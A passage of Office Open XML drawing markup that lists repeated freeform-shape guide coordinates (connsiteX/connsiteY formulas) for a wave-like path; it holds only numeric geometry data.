              <a:gd name="connsiteX31" fmla="*/ 4650026 w 9288370"/>
              <a:gd name="connsiteY31" fmla="*/ 1265798 h 1721151"/>
              <a:gd name="connsiteX32" fmla="*/ 4792008 w 9288370"/>
              <a:gd name="connsiteY32" fmla="*/ 1243899 h 1721151"/>
              <a:gd name="connsiteX33" fmla="*/ 4954126 w 9288370"/>
              <a:gd name="connsiteY33" fmla="*/ 1204617 h 1721151"/>
              <a:gd name="connsiteX34" fmla="*/ 5309678 w 9288370"/>
              <a:gd name="connsiteY34" fmla="*/ 1128278 h 1721151"/>
              <a:gd name="connsiteX35" fmla="*/ 5474724 w 9288370"/>
              <a:gd name="connsiteY35" fmla="*/ 1091167 h 1721151"/>
              <a:gd name="connsiteX36" fmla="*/ 5612132 w 9288370"/>
              <a:gd name="connsiteY36" fmla="*/ 1051509 h 1721151"/>
              <a:gd name="connsiteX37" fmla="*/ 5776618 w 9288370"/>
              <a:gd name="connsiteY37" fmla="*/ 1053037 h 1721151"/>
              <a:gd name="connsiteX38" fmla="*/ 5785786 w 9288370"/>
              <a:gd name="connsiteY38" fmla="*/ 1051213 h 1721151"/>
              <a:gd name="connsiteX39" fmla="*/ 5829381 w 9288370"/>
              <a:gd name="connsiteY39" fmla="*/ 1046878 h 1721151"/>
              <a:gd name="connsiteX40" fmla="*/ 5943596 w 9288370"/>
              <a:gd name="connsiteY40" fmla="*/ 1043237 h 1721151"/>
              <a:gd name="connsiteX41" fmla="*/ 5985730 w 9288370"/>
              <a:gd name="connsiteY41" fmla="*/ 1035396 h 1721151"/>
              <a:gd name="connsiteX42" fmla="*/ 6103109 w 9288370"/>
              <a:gd name="connsiteY42" fmla="*/ 1019019 h 1721151"/>
              <a:gd name="connsiteX43" fmla="*/ 6222406 w 9288370"/>
              <a:gd name="connsiteY43" fmla="*/ 985341 h 1721151"/>
              <a:gd name="connsiteX44" fmla="*/ 6598672 w 9288370"/>
              <a:gd name="connsiteY44" fmla="*/ 902062 h 1721151"/>
              <a:gd name="connsiteX45" fmla="*/ 6766149 w 9288370"/>
              <a:gd name="connsiteY45" fmla="*/ 846132 h 1721151"/>
              <a:gd name="connsiteX46" fmla="*/ 6886312 w 9288370"/>
              <a:gd name="connsiteY46" fmla="*/ 781877 h 1721151"/>
              <a:gd name="connsiteX47" fmla="*/ 7006457 w 9288370"/>
              <a:gd name="connsiteY47" fmla="*/ 699758 h 1721151"/>
              <a:gd name="connsiteX48" fmla="*/ 7231643 w 9288370"/>
              <a:gd name="connsiteY48" fmla="*/ 640778 h 1721151"/>
              <a:gd name="connsiteX49" fmla="*/ 7363123 w 9288370"/>
              <a:gd name="connsiteY49" fmla="*/ 593682 h 1721151"/>
              <a:gd name="connsiteX50" fmla="*/ 7588368 w 9288370"/>
              <a:gd name="connsiteY50" fmla="*/ 531129 h 1721151"/>
              <a:gd name="connsiteX51" fmla="*/ 7782741 w 9288370"/>
              <a:gd name="connsiteY51" fmla="*/ 455936 h 1721151"/>
              <a:gd name="connsiteX52" fmla="*/ 7952094 w 9288370"/>
              <a:gd name="connsiteY52" fmla="*/ 409302 h 1721151"/>
              <a:gd name="connsiteX53" fmla="*/ 8231938 w 9288370"/>
              <a:gd name="connsiteY53" fmla="*/ 259259 h 1721151"/>
              <a:gd name="connsiteX54" fmla="*/ 8428864 w 9288370"/>
              <a:gd name="connsiteY54" fmla="*/ 208471 h 1721151"/>
              <a:gd name="connsiteX55" fmla="*/ 8616510 w 9288370"/>
              <a:gd name="connsiteY55" fmla="*/ 161973 h 1721151"/>
              <a:gd name="connsiteX56" fmla="*/ 8826766 w 9288370"/>
              <a:gd name="connsiteY56" fmla="*/ 152111 h 1721151"/>
              <a:gd name="connsiteX57" fmla="*/ 8917647 w 9288370"/>
              <a:gd name="connsiteY57" fmla="*/ 112232 h 1721151"/>
              <a:gd name="connsiteX58" fmla="*/ 9182272 w 9288370"/>
              <a:gd name="connsiteY58" fmla="*/ 37171 h 1721151"/>
              <a:gd name="connsiteX59" fmla="*/ 9232990 w 9288370"/>
              <a:gd name="connsiteY59" fmla="*/ 24074 h 1721151"/>
              <a:gd name="connsiteX60" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY60" fmla="*/ 0 h 1721151"/>
              <a:gd name="connsiteX61" fmla="*/ 0 w 9288370"/>
              <a:gd name="connsiteY61" fmla="*/ 0 h 1721151"/>
              <a:gd name="connsiteX62" fmla="*/ 8158 w 9288370"/>
              <a:gd name="connsiteY62" fmla="*/ 1671666 h 1721151"/>
              <a:gd name="connsiteX0" fmla="*/ 8158 w 9288370"/>
              <a:gd name="connsiteY0" fmla="*/ 1671666 h 1721151"/>
              <a:gd name="connsiteX1" fmla="*/ 66313 w 9288370"/>
              <a:gd name="connsiteY1" fmla="*/ 1721151 h 1721151"/>
              <a:gd name="connsiteX2" fmla="*/ 313320 w 9288370"/>
              <a:gd name="connsiteY2" fmla="*/ 1690533 h 1721151"/>
              <a:gd name="connsiteX3" fmla="*/ 766051 w 9288370"/>
              <a:gd name="connsiteY3" fmla="*/ 1569826 h 1721151"/>
              <a:gd name="connsiteX4" fmla="*/ 971617 w 9288370"/>
              <a:gd name="connsiteY4" fmla="*/ 1522494 h 1721151"/>
              <a:gd name="connsiteX5" fmla="*/ 1186668 w 9288370"/>
              <a:gd name="connsiteY5" fmla="*/ 1521861 h 1721151"/>
              <a:gd name="connsiteX6" fmla="*/ 1339078 w 9288370"/>
              <a:gd name="connsiteY6" fmla="*/ 1494730 h 1721151"/>
              <a:gd name="connsiteX7" fmla="*/ 1492452 w 9288370"/>
              <a:gd name="connsiteY7" fmla="*/ 1519061 h 1721151"/>
              <a:gd name="connsiteX8" fmla="*/ 1604999 w 9288370"/>
              <a:gd name="connsiteY8" fmla="*/ 1513599 h 1721151"/>
              <a:gd name="connsiteX9" fmla="*/ 1717911 w 9288370"/>
              <a:gd name="connsiteY9" fmla="*/ 1497764 h 1721151"/>
              <a:gd name="connsiteX10" fmla="*/ 1794234 w 9288370"/>
              <a:gd name="connsiteY10" fmla="*/ 1464331 h 1721151"/>
              <a:gd name="connsiteX11" fmla="*/ 2101780 w 9288370"/>
              <a:gd name="connsiteY11" fmla="*/ 1409907 h 1721151"/>
              <a:gd name="connsiteX12" fmla="*/ 2244830 w 9288370"/>
              <a:gd name="connsiteY12" fmla="*/ 1388540 h 1721151"/>
              <a:gd name="connsiteX13" fmla="*/ 2428648 w 9288370"/>
              <a:gd name="connsiteY13" fmla="*/ 1372736 h 1721151"/>
              <a:gd name="connsiteX14" fmla="*/ 2645882 w 9288370"/>
              <a:gd name="connsiteY14" fmla="*/ 1341971 h 1721151"/>
              <a:gd name="connsiteX15" fmla="*/ 2707413 w 9288370"/>
              <a:gd name="connsiteY15" fmla="*/ 1347156 h 1721151"/>
              <a:gd name="connsiteX16" fmla="*/ 2843134 w 9288370"/>
              <a:gd name="connsiteY16" fmla="*/ 1323561 h 1721151"/>
              <a:gd name="connsiteX17" fmla="*/ 2923804 w 9288370"/>
              <a:gd name="connsiteY17" fmla="*/ 1314224 h 1721151"/>
              <a:gd name="connsiteX18" fmla="*/ 2953618 w 9288370"/>
              <a:gd name="connsiteY18" fmla="*/ 1318186 h 1721151"/>
              <a:gd name="connsiteX19" fmla="*/ 2995816 w 9288370"/>
              <a:gd name="connsiteY19" fmla="*/ 1318670 h 1721151"/>
              <a:gd name="connsiteX20" fmla="*/ 3352700 w 9288370"/>
              <a:gd name="connsiteY20" fmla="*/ 1264183 h 1721151"/>
              <a:gd name="connsiteX21" fmla="*/ 3444611 w 9288370"/>
              <a:gd name="connsiteY21" fmla="*/ 1236739 h 1721151"/>
              <a:gd name="connsiteX22" fmla="*/ 3650072 w 9288370"/>
              <a:gd name="connsiteY22" fmla="*/ 1217421 h 1721151"/>
              <a:gd name="connsiteX23" fmla="*/ 3707853 w 9288370"/>
              <a:gd name="connsiteY23" fmla="*/ 1241722 h 1721151"/>
              <a:gd name="connsiteX24" fmla="*/ 3925616 w 9288370"/>
              <a:gd name="connsiteY24" fmla="*/ 1253751 h 1721151"/>
              <a:gd name="connsiteX25" fmla="*/ 3954387 w 9288370"/>
              <a:gd name="connsiteY25" fmla="*/ 1263789 h 1721151"/>
              <a:gd name="connsiteX26" fmla="*/ 3995849 w 9288370"/>
              <a:gd name="connsiteY26" fmla="*/ 1272939 h 1721151"/>
              <a:gd name="connsiteX27" fmla="*/ 4067546 w 9288370"/>
              <a:gd name="connsiteY27" fmla="*/ 1294697 h 1721151"/>
              <a:gd name="connsiteX28" fmla="*/ 4190310 w 9288370"/>
              <a:gd name="connsiteY28" fmla="*/ 1307786 h 1721151"/>
              <a:gd name="connsiteX29" fmla="*/ 4230008 w 9288370"/>
              <a:gd name="connsiteY29" fmla="*/ 1303546 h 1721151"/>
              <a:gd name="connsiteX30" fmla="*/ 4575478 w 9288370"/>
              <a:gd name="connsiteY30" fmla="*/ 1261726 h 1721151"/>
              <a:gd name="connsiteX31" fmla="*/ 4650026 w 9288370"/>
              <a:gd name="connsiteY31" fmla="*/ 1265798 h 1721151"/>
              <a:gd name="connsiteX32" fmla="*/ 4792008 w 9288370"/>
              <a:gd name="connsiteY32" fmla="*/ 1243899 h 1721151"/>
              <a:gd name="connsiteX33" fmla="*/ 4954126 w 9288370"/>
              <a:gd name="connsiteY33" fmla="*/ 1204617 h 1721151"/>
              <a:gd name="connsiteX34" fmla="*/ 5309678 w 9288370"/>
              <a:gd name="connsiteY34" fmla="*/ 1128278 h 1721151"/>
              <a:gd name="connsiteX35" fmla="*/ 5474724 w 9288370"/>
              <a:gd name="connsiteY35" fmla="*/ 1091167 h 1721151"/>
              <a:gd name="connsiteX36" fmla="*/ 5612132 w 9288370"/>
              <a:gd name="connsiteY36" fmla="*/ 1051509 h 1721151"/>
              <a:gd name="connsiteX37" fmla="*/ 5776618 w 9288370"/>
              <a:gd name="connsiteY37" fmla="*/ 1053037 h 1721151"/>
              <a:gd name="connsiteX38" fmla="*/ 5785786 w 9288370"/>
              <a:gd name="connsiteY38" fmla="*/ 1051213 h 1721151"/>
              <a:gd name="connsiteX39" fmla="*/ 5829381 w 9288370"/>
              <a:gd name="connsiteY39" fmla="*/ 1046878 h 1721151"/>
              <a:gd name="connsiteX40" fmla="*/ 5943596 w 9288370"/>
              <a:gd name="connsiteY40" fmla="*/ 1043237 h 1721151"/>
              <a:gd name="connsiteX41" fmla="*/ 5985730 w 9288370"/>
              <a:gd name="connsiteY41" fmla="*/ 1035396 h 1721151"/>
              <a:gd name="connsiteX42" fmla="*/ 6103109 w 9288370"/>
              <a:gd name="connsiteY42" fmla="*/ 1019019 h 1721151"/>
              <a:gd name="connsiteX43" fmla="*/ 6222406 w 9288370"/>
              <a:gd name="connsiteY43" fmla="*/ 985341 h 1721151"/>
              <a:gd name="connsiteX44" fmla="*/ 6598672 w 9288370"/>
              <a:gd name="connsiteY44" fmla="*/ 902062 h 1721151"/>
              <a:gd name="connsiteX45" fmla="*/ 6766149 w 9288370"/>
              <a:gd name="connsiteY45" fmla="*/ 846132 h 1721151"/>
              <a:gd name="connsiteX46" fmla="*/ 6886312 w 9288370"/>
              <a:gd name="connsiteY46" fmla="*/ 781877 h 1721151"/>
              <a:gd name="connsiteX47" fmla="*/ 7006457 w 9288370"/>
              <a:gd name="connsiteY47" fmla="*/ 699758 h 1721151"/>
              <a:gd name="connsiteX48" fmla="*/ 7231643 w 9288370"/>
              <a:gd name="connsiteY48" fmla="*/ 640778 h 1721151"/>
              <a:gd name="connsiteX49" fmla="*/ 7363123 w 9288370"/>
              <a:gd name="connsiteY49" fmla="*/ 593682 h 1721151"/>
              <a:gd name="connsiteX50" fmla="*/ 7588368 w 9288370"/>
              <a:gd name="connsiteY50" fmla="*/ 531129 h 1721151"/>
              <a:gd name="connsiteX51" fmla="*/ 7782741 w 9288370"/>
              <a:gd name="connsiteY51" fmla="*/ 455936 h 1721151"/>
              <a:gd name="connsiteX52" fmla="*/ 7952094 w 9288370"/>
              <a:gd name="connsiteY52" fmla="*/ 409302 h 1721151"/>
              <a:gd name="connsiteX53" fmla="*/ 8231938 w 9288370"/>
              <a:gd name="connsiteY53" fmla="*/ 259259 h 1721151"/>
              <a:gd name="connsiteX54" fmla="*/ 8428864 w 9288370"/>
              <a:gd name="connsiteY54" fmla="*/ 208471 h 1721151"/>
              <a:gd name="connsiteX55" fmla="*/ 8616510 w 9288370"/>
              <a:gd name="connsiteY55" fmla="*/ 161973 h 1721151"/>
              <a:gd name="connsiteX56" fmla="*/ 8826766 w 9288370"/>
              <a:gd name="connsiteY56" fmla="*/ 152111 h 1721151"/>
              <a:gd name="connsiteX57" fmla="*/ 8917647 w 9288370"/>
              <a:gd name="connsiteY57" fmla="*/ 112232 h 1721151"/>
              <a:gd name="connsiteX58" fmla="*/ 9182272 w 9288370"/>
              <a:gd name="connsiteY58" fmla="*/ 37171 h 1721151"/>
              <a:gd name="connsiteX59" fmla="*/ 9232990 w 9288370"/>
              <a:gd name="connsiteY59" fmla="*/ 24074 h 1721151"/>
              <a:gd name="connsiteX60" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY60" fmla="*/ 0 h 1721151"/>
              <a:gd name="connsiteX61" fmla="*/ 0 w 9288370"/>
              <a:gd name="connsiteY61" fmla="*/ 0 h 1721151"/>
              <a:gd name="connsiteX62" fmla="*/ 8158 w 9288370"/>
              <a:gd name="connsiteY62" fmla="*/ 1671666 h 1721151"/>
              <a:gd name="connsiteX0" fmla="*/ 8158 w 9288370"/>
              <a:gd name="connsiteY0" fmla="*/ 1671666 h 1721151"/>
              <a:gd name="connsiteX1" fmla="*/ 66313 w 9288370"/>
              <a:gd name="connsiteY1" fmla="*/ 1721151 h 1721151"/>
              <a:gd name="connsiteX2" fmla="*/ 313320 w 9288370"/>
              <a:gd name="connsiteY2" fmla="*/ 1690533 h 1721151"/>
              <a:gd name="connsiteX3" fmla="*/ 766051 w 9288370"/>
              <a:gd name="connsiteY3" fmla="*/ 1569826 h 1721151"/>
              <a:gd name="connsiteX4" fmla="*/ 971617 w 9288370"/>
              <a:gd name="connsiteY4" fmla="*/ 1522494 h 1721151"/>
              <a:gd name="connsiteX5" fmla="*/ 1186668 w 9288370"/>
              <a:gd name="connsiteY5" fmla="*/ 1521861 h 1721151"/>
              <a:gd name="connsiteX6" fmla="*/ 1339078 w 9288370"/>
              <a:gd name="connsiteY6" fmla="*/ 1494730 h 1721151"/>
              <a:gd name="connsiteX7" fmla="*/ 1492452 w 9288370"/>
              <a:gd name="connsiteY7" fmla="*/ 1519061 h 1721151"/>
              <a:gd name="connsiteX8" fmla="*/ 1604999 w 9288370"/>
              <a:gd name="connsiteY8" fmla="*/ 1513599 h 1721151"/>
              <a:gd name="connsiteX9" fmla="*/ 1717911 w 9288370"/>
              <a:gd name="connsiteY9" fmla="*/ 1497764 h 1721151"/>
              <a:gd name="connsiteX10" fmla="*/ 1794234 w 9288370"/>
              <a:gd name="connsiteY10" fmla="*/ 1464331 h 1721151"/>
              <a:gd name="connsiteX11" fmla="*/ 2101780 w 9288370"/>
              <a:gd name="connsiteY11" fmla="*/ 1409907 h 1721151"/>
              <a:gd name="connsiteX12" fmla="*/ 2244830 w 9288370"/>
              <a:gd name="connsiteY12" fmla="*/ 1388540 h 1721151"/>
              <a:gd name="connsiteX13" fmla="*/ 2428648 w 9288370"/>
              <a:gd name="connsiteY13" fmla="*/ 1372736 h 1721151"/>
              <a:gd name="connsiteX14" fmla="*/ 2645882 w 9288370"/>
              <a:gd name="connsiteY14" fmla="*/ 1341971 h 1721151"/>
              <a:gd name="connsiteX15" fmla="*/ 2707413 w 9288370"/>
              <a:gd name="connsiteY15" fmla="*/ 1347156 h 1721151"/>
              <a:gd name="connsiteX16" fmla="*/ 2843134 w 9288370"/>
              <a:gd name="connsiteY16" fmla="*/ 1323561 h 1721151"/>
              <a:gd name="connsiteX17" fmla="*/ 2923804 w 9288370"/>
              <a:gd name="connsiteY17" fmla="*/ 1314224 h 1721151"/>
              <a:gd name="connsiteX18" fmla="*/ 2953618 w 9288370"/>
              <a:gd name="connsiteY18" fmla="*/ 1318186 h 1721151"/>
              <a:gd name="connsiteX19" fmla="*/ 2995816 w 9288370"/>
              <a:gd name="connsiteY19" fmla="*/ 1318670 h 1721151"/>
              <a:gd name="connsiteX20" fmla="*/ 3352700 w 9288370"/>
              <a:gd name="connsiteY20" fmla="*/ 1264183 h 1721151"/>
              <a:gd name="connsiteX21" fmla="*/ 3444611 w 9288370"/>
              <a:gd name="connsiteY21" fmla="*/ 1236739 h 1721151"/>
              <a:gd name="connsiteX22" fmla="*/ 3650072 w 9288370"/>
              <a:gd name="connsiteY22" fmla="*/ 1217421 h 1721151"/>
              <a:gd name="connsiteX23" fmla="*/ 3707853 w 9288370"/>
              <a:gd name="connsiteY23" fmla="*/ 1241722 h 1721151"/>
              <a:gd name="connsiteX24" fmla="*/ 3925616 w 9288370"/>
              <a:gd name="connsiteY24" fmla="*/ 1253751 h 1721151"/>
              <a:gd name="connsiteX25" fmla="*/ 3954387 w 9288370"/>
              <a:gd name="connsiteY25" fmla="*/ 1263789 h 1721151"/>
              <a:gd name="connsiteX26" fmla="*/ 3995849 w 9288370"/>
              <a:gd name="connsiteY26" fmla="*/ 1272939 h 1721151"/>
              <a:gd name="connsiteX27" fmla="*/ 4067546 w 9288370"/>
              <a:gd name="connsiteY27" fmla="*/ 1294697 h 1721151"/>
              <a:gd name="connsiteX28" fmla="*/ 4190310 w 9288370"/>
              <a:gd name="connsiteY28" fmla="*/ 1307786 h 1721151"/>
              <a:gd name="connsiteX29" fmla="*/ 4230008 w 9288370"/>
              <a:gd name="connsiteY29" fmla="*/ 1303546 h 1721151"/>
              <a:gd name="connsiteX30" fmla="*/ 4575478 w 9288370"/>
              <a:gd name="connsiteY30" fmla="*/ 1261726 h 1721151"/>
              <a:gd name="connsiteX31" fmla="*/ 4650026 w 9288370"/>
              <a:gd name="connsiteY31" fmla="*/ 1265798 h 1721151"/>
              <a:gd name="connsiteX32" fmla="*/ 4792008 w 9288370"/>
              <a:gd name="connsiteY32" fmla="*/ 1243899 h 1721151"/>
              <a:gd name="connsiteX33" fmla="*/ 4954126 w 9288370"/>
              <a:gd name="connsiteY33" fmla="*/ 1204617 h 1721151"/>
              <a:gd name="connsiteX34" fmla="*/ 5309678 w 9288370"/>
              <a:gd name="connsiteY34" fmla="*/ 1128278 h 1721151"/>
              <a:gd name="connsiteX35" fmla="*/ 5474724 w 9288370"/>
              <a:gd name="connsiteY35" fmla="*/ 1091167 h 1721151"/>
              <a:gd name="connsiteX36" fmla="*/ 5612132 w 9288370"/>
              <a:gd name="connsiteY36" fmla="*/ 1051509 h 1721151"/>
              <a:gd name="connsiteX37" fmla="*/ 5776618 w 9288370"/>
              <a:gd name="connsiteY37" fmla="*/ 1053037 h 1721151"/>
              <a:gd name="connsiteX38" fmla="*/ 5785786 w 9288370"/>
              <a:gd name="connsiteY38" fmla="*/ 1051213 h 1721151"/>
              <a:gd name="connsiteX39" fmla="*/ 5829381 w 9288370"/>
              <a:gd name="connsiteY39" fmla="*/ 1046878 h 1721151"/>
              <a:gd name="connsiteX40" fmla="*/ 5943596 w 9288370"/>
              <a:gd name="connsiteY40" fmla="*/ 1043237 h 1721151"/>
              <a:gd name="connsiteX41" fmla="*/ 5985730 w 9288370"/>
              <a:gd name="connsiteY41" fmla="*/ 1035396 h 1721151"/>
              <a:gd name="connsiteX42" fmla="*/ 6103109 w 9288370"/>
              <a:gd name="connsiteY42" fmla="*/ 1019019 h 1721151"/>
              <a:gd name="connsiteX43" fmla="*/ 6222406 w 9288370"/>
              <a:gd name="connsiteY43" fmla="*/ 985341 h 1721151"/>
              <a:gd name="connsiteX44" fmla="*/ 6598672 w 9288370"/>
              <a:gd name="connsiteY44" fmla="*/ 902062 h 1721151"/>
              <a:gd name="connsiteX45" fmla="*/ 6766149 w 9288370"/>
              <a:gd name="connsiteY45" fmla="*/ 846132 h 1721151"/>
              <a:gd name="connsiteX46" fmla="*/ 6886312 w 9288370"/>
              <a:gd name="connsiteY46" fmla="*/ 781877 h 1721151"/>
              <a:gd name="connsiteX47" fmla="*/ 7006457 w 9288370"/>
              <a:gd name="connsiteY47" fmla="*/ 699758 h 1721151"/>
              <a:gd name="connsiteX48" fmla="*/ 7231643 w 9288370"/>
              <a:gd name="connsiteY48" fmla="*/ 640778 h 1721151"/>
              <a:gd name="connsiteX49" fmla="*/ 7363123 w 9288370"/>
              <a:gd name="connsiteY49" fmla="*/ 593682 h 1721151"/>
              <a:gd name="connsiteX50" fmla="*/ 7588368 w 9288370"/>
              <a:gd name="connsiteY50" fmla="*/ 531129 h 1721151"/>
              <a:gd name="connsiteX51" fmla="*/ 7782741 w 9288370"/>
              <a:gd name="connsiteY51" fmla="*/ 455936 h 1721151"/>
              <a:gd name="connsiteX52" fmla="*/ 7952094 w 9288370"/>
              <a:gd name="connsiteY52" fmla="*/ 409302 h 1721151"/>
              <a:gd name="connsiteX53" fmla="*/ 8231938 w 9288370"/>
              <a:gd name="connsiteY53" fmla="*/ 259259 h 1721151"/>
              <a:gd name="connsiteX54" fmla="*/ 8428864 w 9288370"/>
              <a:gd name="connsiteY54" fmla="*/ 208471 h 1721151"/>
              <a:gd name="connsiteX55" fmla="*/ 8616510 w 9288370"/>
              <a:gd name="connsiteY55" fmla="*/ 161973 h 1721151"/>
              <a:gd name="connsiteX56" fmla="*/ 8826766 w 9288370"/>
              <a:gd name="connsiteY56" fmla="*/ 152111 h 1721151"/>
              <a:gd name="connsiteX57" fmla="*/ 8917647 w 9288370"/>
              <a:gd name="connsiteY57" fmla="*/ 112232 h 1721151"/>
              <a:gd name="connsiteX58" fmla="*/ 9182272 w 9288370"/>
              <a:gd name="connsiteY58" fmla="*/ 37171 h 1721151"/>
              <a:gd name="connsiteX59" fmla="*/ 9232990 w 9288370"/>
              <a:gd name="connsiteY59" fmla="*/ 24074 h 1721151"/>
              <a:gd name="connsiteX60" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY60" fmla="*/ 0 h 1721151"/>
              <a:gd name="connsiteX61" fmla="*/ 0 w 9288370"/>
              <a:gd name="connsiteY61" fmla="*/ 0 h 1721151"/>
              <a:gd name="connsiteX62" fmla="*/ 8158 w 9288370"/>
              <a:gd name="connsiteY62" fmla="*/ 1671666 h 1721151"/>
              <a:gd name="connsiteX0" fmla="*/ 8158 w 9288370"/>
              <a:gd name="connsiteY0" fmla="*/ 1671666 h 1721151"/>
              <a:gd name="connsiteX1" fmla="*/ 66313 w 9288370"/>
              <a:gd name="connsiteY1" fmla="*/ 1721151 h 1721151"/>
              <a:gd name="connsiteX2" fmla="*/ 411216 w 9288370"/>
              <a:gd name="connsiteY2" fmla="*/ 1628370 h 1721151"/>
              <a:gd name="connsiteX3" fmla="*/ 766051 w 9288370"/>
              <a:gd name="connsiteY3" fmla="*/ 1569826 h 1721151"/>
              <a:gd name="connsiteX4" fmla="*/ 971617 w 9288370"/>
              <a:gd name="connsiteY4" fmla="*/ 1522494 h 1721151"/>
              <a:gd name="connsiteX5" fmla="*/ 1186668 w 9288370"/>
              <a:gd name="connsiteY5" fmla="*/ 1521861 h 1721151"/>
              <a:gd name="connsiteX6" fmla="*/ 1339078 w 9288370"/>
              <a:gd name="connsiteY6" fmla="*/ 1494730 h 1721151"/>
              <a:gd name="connsiteX7" fmla="*/ 1492452 w 9288370"/>
              <a:gd name="connsiteY7" fmla="*/ 1519061 h 1721151"/>
              <a:gd name="connsiteX8" fmla="*/ 1604999 w 9288370"/>
              <a:gd name="connsiteY8" fmla="*/ 1513599 h 1721151"/>
              <a:gd name="connsiteX9" fmla="*/ 1717911 w 9288370"/>
              <a:gd name="connsiteY9" fmla="*/ 1497764 h 1721151"/>
              <a:gd name="connsiteX10" fmla="*/ 1794234 w 9288370"/>
              <a:gd name="connsiteY10" fmla="*/ 1464331 h 1721151"/>
              <a:gd name="connsiteX11" fmla="*/ 2101780 w 9288370"/>
              <a:gd name="connsiteY11" fmla="*/ 1409907 h 1721151"/>
              <a:gd name="connsiteX12" fmla="*/ 2244830 w 9288370"/>
              <a:gd name="connsiteY12" fmla="*/ 1388540 h 1721151"/>
              <a:gd name="connsiteX13" fmla="*/ 2428648 w 9288370"/>
              <a:gd name="connsiteY13" fmla="*/ 1372736 h 1721151"/>
              <a:gd name="connsiteX14" fmla="*/ 2645882 w 9288370"/>
              <a:gd name="connsiteY14" fmla="*/ 1341971 h 1721151"/>
              <a:gd name="connsiteX15" fmla="*/ 2707413 w 9288370"/>
              <a:gd name="connsiteY15" fmla="*/ 1347156 h 1721151"/>
              <a:gd name="connsiteX16" fmla="*/ 2843134 w 9288370"/>
              <a:gd name="connsiteY16" fmla="*/ 1323561 h 1721151"/>
              <a:gd name="connsiteX17" fmla="*/ 2923804 w 9288370"/>
              <a:gd name="connsiteY17" fmla="*/ 1314224 h 1721151"/>
              <a:gd name="connsiteX18" fmla="*/ 2953618 w 9288370"/>
              <a:gd name="connsiteY18" fmla="*/ 1318186 h 1721151"/>
              <a:gd name="connsiteX19" fmla="*/ 2995816 w 9288370"/>
              <a:gd name="connsiteY19" fmla="*/ 1318670 h 1721151"/>
              <a:gd name="connsiteX20" fmla="*/ 3352700 w 9288370"/>
              <a:gd name="connsiteY20" fmla="*/ 1264183 h 1721151"/>
              <a:gd name="connsiteX21" fmla="*/ 3444611 w 9288370"/>
              <a:gd name="connsiteY21" fmla="*/ 1236739 h 1721151"/>
              <a:gd name="connsiteX22" fmla="*/ 3650072 w 9288370"/>
              <a:gd name="connsiteY22" fmla="*/ 1217421 h 1721151"/>
              <a:gd name="connsiteX23" fmla="*/ 3707853 w 9288370"/>
              <a:gd name="connsiteY23" fmla="*/ 1241722 h 1721151"/>
              <a:gd name="connsiteX24" fmla="*/ 3925616 w 9288370"/>
              <a:gd name="connsiteY24" fmla="*/ 1253751 h 1721151"/>
              <a:gd name="connsiteX25" fmla="*/ 3954387 w 9288370"/>
              <a:gd name="connsiteY25" fmla="*/ 1263789 h 1721151"/>
              <a:gd name="connsiteX26" fmla="*/ 3995849 w 9288370"/>
              <a:gd name="connsiteY26" fmla="*/ 1272939 h 1721151"/>
              <a:gd name="connsiteX27" fmla="*/ 4067546 w 9288370"/>
              <a:gd name="connsiteY27" fmla="*/ 1294697 h 1721151"/>
              <a:gd name="connsiteX28" fmla="*/ 4190310 w 9288370"/>
              <a:gd name="connsiteY28" fmla="*/ 1307786 h 1721151"/>
              <a:gd name="connsiteX29" fmla="*/ 4230008 w 9288370"/>
              <a:gd name="connsiteY29" fmla="*/ 1303546 h 1721151"/>
              <a:gd name="connsiteX30" fmla="*/ 4575478 w 9288370"/>
              <a:gd name="connsiteY30" fmla="*/ 1261726 h 1721151"/>
              <a:gd name="connsiteX31" fmla="*/ 4650026 w 9288370"/>
              <a:gd name="connsiteY31" fmla="*/ 1265798 h 1721151"/>
              <a:gd name="connsiteX32" fmla="*/ 4792008 w 9288370"/>
              <a:gd name="connsiteY32" fmla="*/ 1243899 h 1721151"/>
              <a:gd name="connsiteX33" fmla="*/ 4954126 w 9288370"/>
              <a:gd name="connsiteY33" fmla="*/ 1204617 h 1721151"/>
              <a:gd name="connsiteX34" fmla="*/ 5309678 w 9288370"/>
              <a:gd name="connsiteY34" fmla="*/ 1128278 h 1721151"/>
              <a:gd name="connsiteX35" fmla="*/ 5474724 w 9288370"/>
              <a:gd name="connsiteY35" fmla="*/ 1091167 h 1721151"/>
              <a:gd name="connsiteX36" fmla="*/ 5612132 w 9288370"/>
              <a:gd name="connsiteY36" fmla="*/ 1051509 h 1721151"/>
              <a:gd name="connsiteX37" fmla="*/ 5776618 w 9288370"/>
              <a:gd name="connsiteY37" fmla="*/ 1053037 h 1721151"/>
              <a:gd name="connsiteX38" fmla="*/ 5785786 w 9288370"/>
              <a:gd name="connsiteY38" fmla="*/ 1051213 h 1721151"/>
              <a:gd name="connsiteX39" fmla="*/ 5829381 w 9288370"/>
              <a:gd name="connsiteY39" fmla="*/ 1046878 h 1721151"/>
              <a:gd name="connsiteX40" fmla="*/ 5943596 w 9288370"/>
              <a:gd name="connsiteY40" fmla="*/ 1043237 h 1721151"/>
              <a:gd name="connsiteX41" fmla="*/ 5985730 w 9288370"/>
              <a:gd name="connsiteY41" fmla="*/ 1035396 h 1721151"/>
              <a:gd name="connsiteX42" fmla="*/ 6103109 w 9288370"/>
              <a:gd name="connsiteY42" fmla="*/ 1019019 h 1721151"/>
              <a:gd name="connsiteX43" fmla="*/ 6222406 w 9288370"/>
              <a:gd name="connsiteY43" fmla="*/ 985341 h 1721151"/>
              <a:gd name="connsiteX44" fmla="*/ 6598672 w 9288370"/>
              <a:gd name="connsiteY44" fmla="*/ 902062 h 1721151"/>
              <a:gd name="connsiteX45" fmla="*/ 6766149 w 9288370"/>
              <a:gd name="connsiteY45" fmla="*/ 846132 h 1721151"/>
              <a:gd name="connsiteX46" fmla="*/ 6886312 w 9288370"/>
              <a:gd name="connsiteY46" fmla="*/ 781877 h 1721151"/>
              <a:gd name="connsiteX47" fmla="*/ 7006457 w 9288370"/>
              <a:gd name="connsiteY47" fmla="*/ 699758 h 1721151"/>
              <a:gd name="connsiteX48" fmla="*/ 7231643 w 9288370"/>
              <a:gd name="connsiteY48" fmla="*/ 640778 h 1721151"/>
              <a:gd name="connsiteX49" fmla="*/ 7363123 w 9288370"/>
              <a:gd name="connsiteY49" fmla="*/ 593682 h 1721151"/>
              <a:gd name="connsiteX50" fmla="*/ 7588368 w 9288370"/>
              <a:gd name="connsiteY50" fmla="*/ 531129 h 1721151"/>
              <a:gd name="connsiteX51" fmla="*/ 7782741 w 9288370"/>
